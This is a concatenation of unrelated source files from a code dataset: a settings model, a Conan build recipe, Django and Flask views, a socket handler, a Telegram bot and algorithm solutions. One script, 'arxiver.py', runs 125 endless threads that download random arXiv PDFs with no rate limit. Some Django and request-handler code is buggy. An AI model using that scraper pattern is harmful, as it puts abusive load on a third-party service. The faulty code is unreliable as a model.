'integer',\n 'title': 'Apple Update Auto-Promote Unstable Grace Period Days',\n 'comment': ('Number of days before updates auto-promote from '\n 'unstable to testing.'),\n 'default': 4,\n },\n 'apple_testing_grace_period_days': {\n 'type': 'integer',\n 'title': 'Apple Update Auto-Promote Testing Grace Period Days',\n 'comment': ('Number of days before updates auto-promote 
from '\n 'testing to stable.'),\n 'default': 7,\n },\n 'email_admin_list': {\n 'type': 'string',\n 'title': 'Admin List Email',\n 'comment': 'Server notifications are emailed to this address',\n },\n 'email_domain': {\n 'type': 'string',\n 'title': 'Email Domain',\n },\n 'email_sender': {\n 'type': 'string',\n 'title': 'Email Sender',\n 'comment': 'e.g. Simian Team <admin@example.com>',\n },\n 'email_reply_to': {\n 'type': 'string',\n 'title': 'Email reply-to',\n 'comment': 'e.g. Simian Team <admin@example.com>',\n },\n 'email_on_every_change': {\n 'type': 'bool',\n 'title': 'Notify Admins of all changes.',\n 'comment': 'Check to send a mail to all admins on every change.',\n 'default': False,\n },\n 'uuid_lookup_url': {\n 'type': 'string',\n 'title': 'UUID lookup tool URL',\n 'comment': 'uuid will be appended to URL like http://corp/<uuid>',\n },\n 'owner_lookup_url': {\n 'type': 'string',\n 'title': 'Owner lookup tool URL',\n 'comment': ('owner username will be appended to URL like '\n 'http://corp/<owner-username>'),\n },\n 'required_issuer': {\n 'type': 'string',\n 'title': 'Required Issuer',\n 'suffix': True,\n },\n 'xsrf_secret': {\n 'type': 'random_str',\n 'title': 'XSRF secret',\n },\n 'server_private_key_pem': {\n 'type': 'pem',\n 'suffix': True,\n },\n 'server_public_cert_pem': {\n 'type': 'pem',\n 'suffix': True,\n },\n 'ca_public_cert_pem': {\n 'type': 'pem',\n 'suffix': True,\n }\n}\n\n\nclass Settings(base.KeyValueCache):\n \"\"\"Model for settings.\"\"\"\n\n @classmethod\n def GetType(cls, name):\n \"\"\"Get the type for a setting.\n\n Args:\n name: str, like 'ca_public_cert_pem' or 'suffix_ca_public_cert_pem'\n if suffix==True in the SETTINGS[name] dict above.\n Returns:\n type like 'pem', 'string', 'random_str', None\n \"\"\"\n if name in SETTINGS:\n return SETTINGS.get(name, {}).get('type')\n # Look for name as a prefix to a setting with suffix==True.\n for k in SETTINGS:\n if ('suffix' in SETTINGS[k] and SETTINGS[k]['suffix'] and\n name.endswith('_%s' % k)):\n return SETTINGS.get(k, {}).get('type')\n return None\n\n @classmethod\n def GetItem(cls, name):\n \"\"\"Get an item from settings.\n\n If the item is in a serialized container it will be deserialized\n before returning it.\n\n Args:\n name: str, like 'ca_public_cert_pem' or 'required_issuer'\n Returns:\n (value for that setting, datetime time of last change)\n \"\"\"\n if Settings.GetType(name) in ['pem', 'string', 'random_str']:\n value, mtime = super(Settings, cls).GetItem(name)\n else:\n value, mtime = cls.GetSerializedItem(name)\n\n if mtime is None: # item was not in Datastore, use default if it exists.\n value = SETTINGS.get(name, {}).get('default')\n return value, mtime\n\n @classmethod\n def SetItem(cls, name, value):\n \"\"\"Set an item into settings.\n\n If the item belongs in a serialized container it will be serialized\n before storage.\n\n Args:\n name: str, like 'ca_public_cert_pem'\n value: str, value\n \"\"\"\n if Settings.GetType(name) in ['pem', 'string', 'random_str']:\n return super(Settings, cls).SetItem(name, value)\n else:\n return cls.SetSerializedItem(name, value)\n\n @classmethod\n def GetAll(cls):\n \"\"\"Return a dictionary of all settings.\n\n Format = {\n 'setting name': {\n 'value': value,\n 'mtime': datetime,\n },\n }\n \"\"\"\n settings = SETTINGS.copy()\n for setting in SETTINGS:\n value, mtime = cls.GetItem(setting)\n settings[setting]['value'] = value\n settings[setting]['mtime'] = mtime\n return 
settings","sub_path":"src/simian/mac/models/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"208017914","text":"from conans import ConanFile, tools, RunEnvironment\nfrom conans.errors import ConanInvalidConfiguration\nimport os\nimport json\nimport re\n\nclass CrashpadConan(ConanFile):\n name = \"crashpad\"\n version = \"20200624\"\n description = \"Crashpad is a crash-reporting system.\"\n license = \"Apache-2.0\"\n homepage = \"https://github.com/chromium/crashpad.git\"\n url = \"https://github.com/bincrafters/conan-crashpad\"\n topics = (\"conan\", \"crash-reporting\", \"logging\", \"minidump\", \"crash\")\n settings = \"os\", \"compiler\", \"build_type\", \"arch\"\n options = {'linktime_optimization': [True, False], 'fPIC': [True, False]}\n default_options = {\"linktime_optimization\": False, 'fPIC': True}\n exports = [ \"patches/*\", \"LICENSE.md\" ]\n short_paths = True\n\n _commit_id = \"41456998748bd3c058f36f5d785810bf7ea7a954\"\n _source_dir = \"crashpad\"\n _build_name = \"out/Conan\"\n _build_dir = os.path.join(_source_dir, _build_name)\n\n def _depot_tools(self):\n return os.path.join(self.source_folder, \"depot_tools\")\n\n def _crashpad_source_base(self):\n return os.path.join(self.source_folder, \"crashpad_source\")\n\n def _crashpad_source(self):\n return os.path.join(self._crashpad_source_base(), \"crashpad\")\n\n def build_requirements(self):\n self.build_requires(\"depot_tools/20200407\")\n self.build_requires(\"ninja/1.10.2\")\n\n def requirements(self):\n if self.settings.os == \"Linux\":\n self.requires(\"openssl/1.1.1k\")\n self.requires(\"zlib/1.2.11\")\n\n def _mangle_spec_for_gclient(self, solutions):\n return json.dumps(solutions) \\\n .replace(\"\\\"\", \"\\\\\\\"\") \\\n .replace(\"false\", \"False\") \\\n .replace(\"true\", \"True\")\n\n def _make_spec(self):\n solutions = [{\n \"url\": \"%s@%s\" % (self.homepage, self._commit_id),\n \"managed\": False,\n \"name\": \"%s\" % (self.name),\n }]\n return \"solutions=%s\" % self._mangle_spec_for_gclient(solutions)\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n def configure(self):\n # It's not a C project, but libcxx is hardcoded in the project\n del self.settings.compiler.libcxx\n del self.settings.compiler.cppstd\n\n if self.settings.os != \"Windows\" and not self.options.fPIC:\n raise ConanInvalidConfiguration(\"We only support compiling with fPIC enabled!\")\n\n def source(self):\n env = RunEnvironment(self).vars\n # We have to enable auto-updating - depot_tools won't work otherwise\n env[\"DEPOT_TOOLS_UPDATE\"] = \"1\"\n\n with tools.environment_append(env):\n self.run(\"gclient config --spec=\\\"%s\\\"\" % self._make_spec())\n self.run(\"gclient sync --no-history\")\n\n if self.settings.os == \"Windows\":\n tools.patch(base_path=os.path.join(self._source_dir, \"third_party/mini_chromium/mini_chromium\"),\n patch_file=\"patches/windows_adaptions.patch\")\n\n def _get_target_cpu(self):\n arch = str(self.settings.arch)\n\n if arch == \"x86\":\n return \"x86\"\n elif arch == \"x86_64\":\n return \"x64\"\n\n # best effort... 
please contribute, if you actually tested those platforms\n elif arch.startswith(\"arm\"):\n match = re.match('^armv([0-9]+)', arch)\n if int(match.group(1)) >= 8 and not \"32\" in arch:\n return \"arm64\"\n else:\n return \"arm\"\n elif arch.startswith(\"mips\"):\n return \"mipsel\"\n\n raise ConanInvalidConfiguration(\"your architecture (%s) is not supported\" % arch)\n\n def _setup_args_gn(self):\n os_map = { 'Windows': 'win', 'Linux': 'linux' } # Maps conan os identifiers to GN os identifiers\n target_os = os_map[str(self.settings.os)]\n args = [\"is_debug=%s\" % (\"true\" if self.settings.build_type == \"Debug\" else \"false\"),\n \"target_cpu=\\\\\\\"%s\\\\\\\"\" % self._get_target_cpu(),\n \"target_os=\\\\\\\"{}\\\\\\\"\".format(target_os),\n \"target_sysroot=\\\\\\\"{}\\\\\\\"\".format(os.environ.get('sysroot', '')) ]\n\n if self.settings.os == \"Macos\" and self.settings.get_safe(\"os.version\"):\n args += [ \"mac_deployment_target=\\\\\\\"%s\\\\\\\"\" % self.settings.os.version ]\n if self.settings.os == \"Windows\":\n args += [ \"linktime_optimization=%s\" % str(self.options.linktime_optimization).lower()]\n if self.settings.os == \"Windows\" and self.settings.get_safe(\"compiler.runtime\"):\n crt = str(self.settings.compiler.runtime)\n args += [ \"dynamic_crt=%s\" % (\"true\" if crt.startswith(\"MD\") else \"false\") ]\n if self.settings.os == \"Linux\":\n args += [ \"crashpad_use_boringssl_for_http_transport_socket=true\"]\n return \" \".join(args)\n\n def build(self):\n tools.patch(patch_file=\"patches/openssl_lib_order.patch\")\n\n BUILD_gn = 'crashpad/third_party/mini_chromium/mini_chromium/build/BUILD.gn'\n tools.replace_in_file(BUILD_gn, 'cc = \"clang\"', 'cc = \"{}\"'.format(os.environ.get('CC', 'cc')))\n tools.replace_in_file(BUILD_gn, 'cxx = \"clang++\"', 'cxx = \"{}\"'.format(os.environ.get('CXX', 'c++')))\n\n if self.settings.os != \"Windows\" and self.settings.compiler == \"gcc\":\n tools.replace_in_file(BUILD_gn, '\"-Werror\",', '\"-Wno-multichar\",')\n tools.replace_in_file(BUILD_gn, '\"-Wheader-hygiene\",', '')\n tools.replace_in_file(BUILD_gn, '\"-Wnewline-eof\",', '')\n tools.replace_in_file(BUILD_gn, '\"-Wstring-conversion\",', '')\n tools.replace_in_file(BUILD_gn, '\"-Wexit-time-destructors\"', '')\n tools.replace_in_file(BUILD_gn, '\"-fobjc-call-cxx-cdtors\",', '')\n\n def quote(x):\n return '\"{}\"'.format(x)\n\n ldflags = list(map(quote, os.environ.get('LDFLAGS', '').split(' ')))\n\n cflags = list(map(quote, os.environ.get('CFLAGS', '').split(' ')))\n cflags.append('\"-std=c11\"')\n\n cxxflags = list(map(quote, os.environ.get('CXXFLAGS', '').split(' ')))\n cxxflags.append('\"-std=c++14\"')\n\n if \"openssl\" in self.deps_cpp_info.deps:\n openssl_info = self.deps_cpp_info[\"openssl\"]\n ldflags.append('\"-L{}\"'.format(openssl_info.lib_paths[0]))\n cxxflags.append('\"-I{}\"'.format(openssl_info.include_paths[0]))\n\n if \"zlib\" in self.deps_cpp_info.deps:\n zlib_info = self.deps_cpp_info[\"zlib\"]\n ldflags.append('\"-L{}\"'.format(zlib_info.lib_paths[0]))\n cxxflags.append('\"-I{}\"'.format(zlib_info.include_paths[0]))\n\n tools.replace_in_file(BUILD_gn, 'ldflags = []', 'ldflags = [ {} ]'.format(\", \".join(ldflags)))\n tools.replace_in_file(BUILD_gn, 'cflags_c = [ \"-std=c11\" ]', 'cflags_c = [ {} ]'.format(\", \".join(cflags)))\n tools.replace_in_file(BUILD_gn, 'cflags_cc = [ \"-std=c++14\" ]', 'cflags_cc = [ {} ]'.format(\", \".join(cxxflags)))\n\n with tools.chdir(self._source_dir):\n self.run('gn gen %s --args=\"%s\"' % (self._build_name, 
self._setup_args_gn()), run_environment=True)\n            self.run(\"ninja -j%d -C %s\" % (tools.cpu_count(), self._build_name), run_environment=True)\n\n    def _copy_lib(self, src_dir):\n        self.copy(\"*.a\", dst=\"lib\",\n                  src=os.path.join(self._build_dir, src_dir), keep_path=False)\n        self.copy(\"*.lib\", dst=\"lib\",\n                  src=os.path.join(self._build_dir, src_dir), keep_path=False)\n\n    def _copy_headers(self, dst_dir, src_dir):\n        self.copy(\"*.h\", dst=os.path.join(\"include\", dst_dir),\n                  src=os.path.join(self._source_dir, src_dir))\n\n    def _copy_bin(self, src_bin):\n        self.copy(src_bin, src=self._build_dir, dst=\"bin\")\n        self.copy(\"%s.exe\" % src_bin, src=self._build_dir, dst=\"bin\")\n\n    def package(self):\n        self.copy(\"LICENSE\", dst=\"licenses\", src=self._source_dir,\n                  ignore_case=True, keep_path=False)\n\n        self._copy_headers(\"crashpad/client\", \"client\")\n        self._copy_headers(\"crashpad/util\", \"util\")\n        self._copy_headers(\"mini_chromium\", \"third_party/mini_chromium/mini_chromium\")\n        self._copy_lib(\"obj/client\")\n        self._copy_lib(\"obj/util\")\n        self._copy_lib(\"obj/third_party/mini_chromium\")\n        self._copy_bin(\"crashpad_handler\")\n\n    def package_info(self):\n        self.cpp_info.includedirs = [ \"include/crashpad\", \"include/mini_chromium\" ]\n        self.cpp_info.libdirs = [ \"lib\" ]\n        self.cpp_info.libs = [ \"client\", \"util\", \"base\" ]\n\n        if self.settings.os == \"Macos\":\n            self.cpp_info.exelinkflags.append(\"-framework CoreFoundation\")\n            self.cpp_info.exelinkflags.append(\"-framework CoreGraphics\")\n            self.cpp_info.exelinkflags.append(\"-framework CoreText\")\n            self.cpp_info.exelinkflags.append(\"-framework Foundation\")\n            self.cpp_info.exelinkflags.append(\"-framework IOKit\")\n            self.cpp_info.exelinkflags.append(\"-framework Security\")\n            self.cpp_info.exelinkflags.append(\"-lbsm\")\n            self.cpp_info.sharedlinkflags = self.cpp_info.exelinkflags\n","sub_path":"third_party/conan/recipes/crashpad/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":9188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"13859157","text":"import sys # Hangul (Korean) encoding module\nimport io # Hangul encoding module 2\nimport urllib.request as dw\n\nsys.stdout = io.TextIOWrapper(sys.stdout.detach(), encoding = 'utf-8')# Hangul encoding\nsys.stderr = io.TextIOWrapper(sys.stderr.detach(), encoding = 'utf-8')# Hangul encoding 2\n\nimgUrl = \"http://blogfiles14.naver.net/MjAxNzAzMTJfMTg4/MDAxNDg5MjQ2NjIzNzQ2.-Jp0_ltrm8BKtDFvu6vnhG94BjmNf87wAD64Z2CjLZkg.dEZbWkcDL-nm3pY3oVA-gsYVFyt_PD51HpRQ2WqBTuUg.JPEG.i0046279/cute-melted-animals-14-58beb6272f9a2__605_by_ImageRaker.jpg\"\n# copy the image link address and make it a URL variable\nhtmlURL = \"http://naver.com\"\n\nsavePath1 = \"C:/Users/For Programming/test1.jpg\"\nsavePath2 = \"C:/Users/For Programming/index.html\"\n\nf = dw.urlopen(imgUrl).read()\nf2 = dw.urlopen(htmlURL).read()\n\nsaveFile1 = open(savePath1,'wb') # w: write, r: read, a: add\nsaveFile1.write(f)\nsaveFile1.close()\n\nwith open(savePath2,'wb') as saveFile2:\n    saveFile2.write(f2)\n\n#urlretrieve: save -> open(\"r\") -> assign to a variable -> save / easy for data that needs no parsing.\n#urlopen: assign to a variable -> parse -> save (db) # convenient when the data must be processed through several intermediate steps.\nprint(\"Download complete!\")\n","sub_path":"0812study(1).py","file_name":"0812study(1).py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"95245032","text":"# Time: O(n)\n# Space: O(1)\n#\n# Given an array nums containing n + 1 integers where each integer\n# is between 1 and n (inclusive), prove that 
at least one duplicate\n# element must exist. Assume that there is only one duplicate number,\n# find the duplicate one.\n#\n# Note:\n# - You must not modify the array (assume the array is read only).\n# - You must use only constant extra space.\n# - Your runtime complexity should be less than O(n^2).\n#\n\n# Two pointers method, same as Linked List Cycle II.\n# Build a graph over nums: from each index i draw an edge i -> nums[i]. Because a duplicated number\n# target exists, at least two edges point at position target, so the graph must contain a cycle whose\n# entry is exactly target; the problem is therefore equivalent to 142. Linked List Cycle II.\nclass Solution(object):\n    def findDuplicate(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: int\n        \"\"\"\n        # slow = fast = 0 # WRONG: cannot initialize slow/fast to 0 -> they don't enter the 1st while loop.\n        slow, fast = nums[0], nums[nums[0]]\n        while slow != fast:\n            slow = nums[slow]\n            fast = nums[nums[fast]]\n\n        fast = 0\n        while slow != fast:\n            slow = nums[slow]\n            fast = nums[fast]\n        return slow\n\n\n# Time: O(nlogn)\n# Space: O(1)\n# Binary search method: let cnt[i] be how many numbers in nums are <= i. With duplicate target,\n# every i in [1, target-1] satisfies cnt[i] <= i while every i in [target, n] satisfies cnt[i] > i,\n# so the predicate is monotonic. The answer is the smallest i in [1, n] with cnt[i] > i.\n\nclass Solution2(object):\n    def findDuplicate(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: int\n        \"\"\"\n        left, right = 1, len(nums) - 1\n\n        while left < right:\n            mid = left + (right - left) // 2 # floor division: plain '/' makes mid a float in Python 3\n            # Get count of num <= mid.\n            count = sum(x <= mid for x in nums)\n            if count > mid: # mid is ok\n                right = mid\n            else:\n                left = mid + 1\n        return left\n\n# Time: O(n)\n# Space: O(n)\nclass Solution3(object):\n    def findDuplicate(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: int\n        \"\"\"\n        duplicate = 0\n        # Mark the value as visited by negative.\n        for num in nums:\n            if nums[abs(num) - 1] > 0:\n                nums[abs(num) - 1] *= -1\n            else:\n                duplicate = abs(num)\n                break\n        # Rollback the value.\n        for num in nums:\n            if nums[abs(num) - 1] < 0:\n                nums[abs(num) - 1] *= -1\n            else:\n                break\n        return duplicate\n\nprint(Solution().findDuplicate([1,3,4,2,2])) # 2","sub_path":"Python/find-the-duplicate-number.py","file_name":"find-the-duplicate-number.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"245210679","text":"import shutil\nimport requests\nfrom random import randint\nimport time\nimport threading\n\ndef save():\n    while 1:\n        r0 = randint(10, 18)\n        r1 = randint(1, 12)\n        r2 = randint(1000, 9999)\n\n        if(len(str(r1)) == 1):\n            r1 = \"0\" + str(r1)\n\n        url = \"https://arxiv.org/pdf/\" + str(r0) + str(r1) + \".0\" + str(r2) + \".pdf\"\n        response = requests.get(url, stream=True)\n        with open(str(r0) + str(r1) + '.0' + str(r2) + '.pdf', 'wb') as out_file:\n            shutil.copyfileobj(response.raw, out_file)\n        del response\n\n\nfor i in range(125): threading.Thread(target=save).start()\n","sub_path":"arxiver.py","file_name":"arxiver.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"77435271","text":"from django.http import JsonResponse\n\n\nfrom Blog.forms import Form_AddP, Form_AddC\nfrom Blog.models import BlogPosts, Blog, PostComments\nfrom members.models import UserInfo\n\n\n\ndef postg(request, bid):\n    if request.method == 'GET':\n        id = get_user(request)\n        if id is None:\n            return JsonResponse({'status': -1, 'message': 'invalid'})\n        pid = request.GET.get('id')\n        p = BlogPosts.objects.filter(post_id=pid).first()\n        post = {'datetime': p.time, 'id': p.post_id, 'title': p.title, 'summary': p.summary, 'text': p.text}\n        
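# note: .first() returns None when no post matches pid, so building the dict above would raise AttributeError\n        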
res = {'status': 1, 'post': post}\n #print(res)\n return JsonResponse(res)\n if request.method == 'POST':\n form = Form_AddP(request.POST)\n if form.is_valid():\n s = form.cleaned_data['summary']\n t = form.cleaned_data['text']\n t2 = form.cleaned_data['title']\n blog = Blog.objects.filter(blog_id=bid).first()\n if blog is not None:\n post = BlogPosts.create(blog, t2, s, t)\n post.save()\n return JsonResponse({'status': 1, 'message': 'Successfully Added'})\n\n\ndef commentsg(request):\n res = {}\n user = get_user(request)\n if user is None:\n return JsonResponse({'status': -1, 'message': 'invalid token'})\n post_id = request.GET.get('post_id')\n c = int(request.GET.get('count'))\n o = int(request.GET.get('offset'))\n post = BlogPosts.objects.filter(post_id=post_id).first()\n comments = list(PostComments.objects.filter(post=post).order_by('time'))[o:o + c]\n res['status'] = 1\n res['comments'] = []\n for c in comments:\n temp = {'datetime': c.time, 'text': c.text}\n res['comments'].append(temp)\n return JsonResponse(res)\n\n\ndef postsg(request, blog_id):\n res = {}\n user = get_user(request)\n if user is None:\n print('invalid')\n return JsonResponse({'status': -1, 'message': 'invalid'})\n print('In get posts', user)\n c = int(request.GET.get('count'))\n o = int(request.GET.get('offset'))\n p = list(BlogPosts.objects.filter(blog__blog_id=blog_id).order_by('time'))[o:o + c]\n res['status'] = 1\n #print(res)\n res['posts'] = []\n for p in p:\n temp = {'datetime': p.time, 'id': p.post_id, 'title': p.title, 'summary': p.summary}\n res['posts'].append(temp)\n return JsonResponse(res)\n\n\ndef comment_c(request):\n if request.method == 'POST':\n u = get_user(request)\n if u is None:\n return JsonResponse({'status': -1, 'message': 'invalid'})\n f = Form_AddC(request.POST)\n if f.is_valid():\n print('form is valid')\n text = f.cleaned_data['text']\n post_id = f.cleaned_data[\"id_p\"]\n post = BlogPosts.objects.filter(post_id=post_id).first()\n if post is not None:\n comment = PostComments.create(post, text)\n comment.save()\n print(comment)\n ans = {'status': 1}\n tmp = {'text': text, 'datetime': comment.time}\n ans['comment'] = tmp\n print(ans)\n\n return JsonResponse({'status': 1, 'comment': ans})\n else:\n print('form is not valid')\n return JsonResponse({'status': -1, 'message': 'Under Construction'})\n\n\n\n\ndef get_user(request):\n t = request.META.__getitem__('HTTP_X_TOKEN')\n id = UserInfo.objects.filter(token=t).first()\n if id is not None:\n return id.user\n return None\n\n# post_id text POST\ndef comment_c(request):\n if request.method == 'POST':\n user = get_user(request)\n if user is None:\n return JsonResponse({'status': -1, 'message': 'invalid token'})\n form = Form_AddC(request.POST)\n if form.is_valid():\n print('form is valid')\n text = form.cleaned_data['text']\n post_id = form.cleaned_data[\"id_p\"]\n post = BlogPosts.objects.filter(post_id=post_id).first()\n if post is not None:\n comment = PostComments.create(post, text)\n comment.save()\n print(comment)\n ans = {'status': 1}\n temp = {'text': text, 'datetime': comment.time}\n ans['comment'] = temp\n print(ans)\n\n return JsonResponse({'status': 1, 'comment': ans})\n else:\n print('form is not valid')\n return JsonResponse({'status': -1, 'message': 'Under Construction'})\n\n\n","sub_path":"phase-3-amirhoseinsa-master/BlogMaker/Blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} 
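The two comment blocks in the find-the-duplicate-number record above (the cycle argument and the monotone-count argument) both lend themselves to a worked check. A minimal standalone sketch of the two-phase pointer walk, using an illustrative array that is not part of the dataset:

def find_duplicate(nums):
    # Phase 1: slow follows one edge of the i -> nums[i] graph per step,
    # fast follows two; they meet somewhere inside the cycle.
    slow, fast = nums[0], nums[nums[0]]
    while slow != fast:
        slow = nums[slow]
        fast = nums[nums[fast]]
    # Phase 2: restart one pointer from index 0; walking both at equal
    # speed makes them meet at the cycle entrance, the duplicated value.
    fast = 0
    while slow != fast:
        slow = nums[slow]
        fast = nums[fast]
    return slow

print(find_duplicate([3, 1, 3, 4, 2]))  # prints 3

And a hand trace of the monotone count cnt(i) behind the binary-search variant, again on an illustrative array:

nums = [1, 3, 4, 2, 2]
# i:      1  2  3  4
# cnt(i): 1  3  4  5   -> the smallest i with cnt(i) > i is 2, the duplicate
for i in range(1, 5):
    print(i, sum(x <= i for x in nums))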
+{"seq_id":"595383824","text":"from flask import Blueprint, render_template, redirect, url_for, flash\nfrom flask_breadcrumbs import register_breadcrumb\nfrom ..forms.user_form import UserForm, UserEdit\nfrom ..utilities.functions import sendRequest\nfrom .auth import admin_required\n\nfrom flask_login import login_required\n\nimport json\n\nuser = Blueprint(\"user\", __name__, url_prefix=\"/user\")\n\n\n@user.route(\"/\")\n@login_required\n@admin_required\n@register_breadcrumb(user, '.', 'Users')\ndef index():\n req = sendRequest(method=\"get\", url=\"/users\", auth=False)\n users = json.loads(req.text)['Users']\n title = \"Users List\"\n return render_template(\"users.html\", title=title, users=users) # Mostrar template\n\n\n@user.route(\"/add-user\", methods=[\"GET\", \"POST\"])\n@login_required\n@admin_required\n@register_breadcrumb(user, \".add\", \"Add User\")\ndef create():\n form = UserForm() # Instanciar formulario\n if form.validate_on_submit(): # Si el formulario ha sido enviado y es valido correctamente\n user = {\n \"email\": form.email.data,\n \"password\": form.password.data,\n \"admin\": form.admin.data\n }\n data = json.dumps(user)\n req = sendRequest(method=\"post\", url=\"/users\", data=data, auth=True)\n return redirect(url_for(\"user.index\")) # Redirecciona a la lista de usuarios\n return render_template(\"user_form.html\", form=form)\n\n\n@user.route(\"/edit/<int:id>\", methods=[\"GET\",\"POST\"])\n@login_required\n@admin_required\n@register_breadcrumb(user, \".edit\", \"Edit User\")\ndef edit(id):\n form = UserEdit()\n if not form.is_submitted():\n req = sendRequest(method=\"get\", url=\"/user/\" + str(id), auth=True)\n if req.status_code == 404:\n flash(\"User not found\", \"danger\")\n return redirect(url_for(\"user.index\"))\n user = json.loads(req.text)\n form.email.data = user[\"email\"]\n form.admin.data = user[\"admin\"]\n\n if form.validate_on_submit():\n user = {\n \"email\": form.email.data,\n \"admin\": form.admin.data\n }\n data = json.dumps(user)\n req = sendRequest(method=\"put\", url=\"/user/\" + str(id), data=data, auth=True)\n flash(\"User has been edited\", \"success\")\n return redirect(url_for(\"user.index\"))\n return render_template(\"user-edit.html\", form=form, id=id)\n\n\n@user.route('delete/<int:id>')\n@login_required\n@admin_required\ndef delete(id):\n req = sendRequest(method=\"delete\", url=\"/user/\" + str(id), auth=True)\n flash(\"User has been deleted\", \"danger\")\n return redirect(url_for('user.index'))\n\n\n","sub_path":"web/main/routes/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"185160516","text":"# -*- coding: utf-8 -*-\n\nimport socket\nimport sys\nimport json\nfrom threading import current_thread\nfrom Request import Request\n\n\nclass DeliverRequest(Request):\n\tdef __init__(self):\n\t\tRequest.__init__(self)\n\n\tdef getName(self):\n\t\treturn 'deliver'\n\n\tdef handle(self, socket, request):\n\t\tprint('['+str(current_thread().name)+'] - Received ' + self.getName() + ' request')\n\n\t\torder = {}\n\t\torder['orderid'] = request['orderid']\n\t\torder['status'] = 'ready'\n\n\t\tnew = {}\n\t\tnew['status'] = 'topay'\n\n\t\tstatus = self.database.update(order, new)\n\n\t\tif status == False:\n\t\t\tselect = {}\n\t\t\tselect['orderid'] = request['orderid']\n\t\t\tcheck = self.database.select(select)\n\t\t\tif check == False:\n\t\t\t\tselect['error'] = 'no order found'\n\t\t\telif check.status == 
'ordered':\n\t\t\t\tselect['error'] = 'order not ready'\n\t\t\tresponse = select\n\t\telse:\n\t\t\tresponse = status\n\n\t\tsocket.sendall(json.dumps(response).encode('UTF-8'))\n\t\tsocket.close()\n","sub_path":"server/DeliverRequest.py","file_name":"DeliverRequest.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"383147444","text":"from BotHandler import BotHandler\r\nimport datetime\r\nimport data as tdata\r\nfrom dict_manager import *\r\n\r\nBOT = BotHandler(tdata.TOKEN) \r\n\r\ndef main(): \r\n    new_offset = None\r\n\r\n    while True:\r\n        prep_message_id = -1\r\n\r\n        BOT.get_updates(new_offset)\r\n\r\n        last_update = BOT.get_last_update()\r\n        if last_update == None:\r\n            return\r\n\r\n        last_update_id = last_update['update_id']\r\n        last_chat_text = last_update['message']['text']\r\n        last_chat_id = last_update['message']['chat']['id']\r\n        last_chat_name = last_update['message']['chat']['first_name']\r\n        last_chat_username = last_update['message']['chat']['username']\r\n\r\n        if last_chat_text.startswith(\"/\"):\r\n            if last_chat_text == \"/start\":\r\n                BOT.send_message(last_chat_id, \"This bot will help you learn languages \\n It is still under development, so you will have to wait\")\r\n            elif last_chat_text == \"/help\":\r\n                BOT.send_message(last_chat_id, \"\\t Help \\n */word* - new word\")\r\n\r\n        else:\r\n            # The user is asking for a word\r\n            BOT.send_message(last_chat_id, make_string(last_chat_text))\r\n\r\n        new_offset = last_update_id + 1\r\n\r\nif __name__ == '__main__':\r\n    now = datetime.datetime.now() \r\n    print(\"Starting the bot at\", now, \"\\n\")\r\n    try:\r\n        main()\r\n    except Exception as e:\r\n        print(\"Got an Exception\")\r\n        print(e)\r\n\r\n","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"652795249","text":"import json\n\nfrom django.contrib.gis import geos\nfrom django.urls import reverse\nfrom rest_framework import status\nfrom test_plus.test import TestCase\n\nfrom poznaj.points.tests.factories import PointFactory\nfrom poznaj.stories.filters import WRONG_LAT_LONG_TEXT\nfrom poznaj.stories.models import Story\n\nfrom .factories import StoryFactory\n\n\nclass TestStoriesViewSet(TestCase):\n    def setUp(self):\n        self.point = PointFactory()\n        self.story = StoryFactory.create(points=(self.point,))\n        self.list_url = reverse('story-list')\n        self.detail_url = reverse('story-detail', kwargs={'pk': self.story.id})\n        self.user = self.make_user('user_one')\n        self.client.login(username=self.user.username, password='password')\n\n    def test_get_all_stories(self):\n        response = self.client.get(self.list_url, format='json')\n        self.assertEqual(response.status_code, status.HTTP_200_OK)\n        self.assertEqual(\n            response.json(),\n            [{\n                'id': self.story.id,\n                'points': [self.point.id],\n                'title': self.story.title,\n                'first_point': self.story.first_point.id,\n                'description': self.story.description,\n                'duration': '{:02}:00:{:02}'.format(\n                    self.story.duration.days, self.story.duration.seconds\n                )\n            }]\n        )\n\n    def test_create_story(self):\n        response = self.client.post(\n            self.list_url,\n            data={\n                'title': 'my_story',\n                'description': 'example_description',\n                'duration': '00:01:00',\n                'points': [self.point.id],\n            }\n        )\n        self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n        self.assertEqual(Story.objects.count(), 2)\n        database_story = 
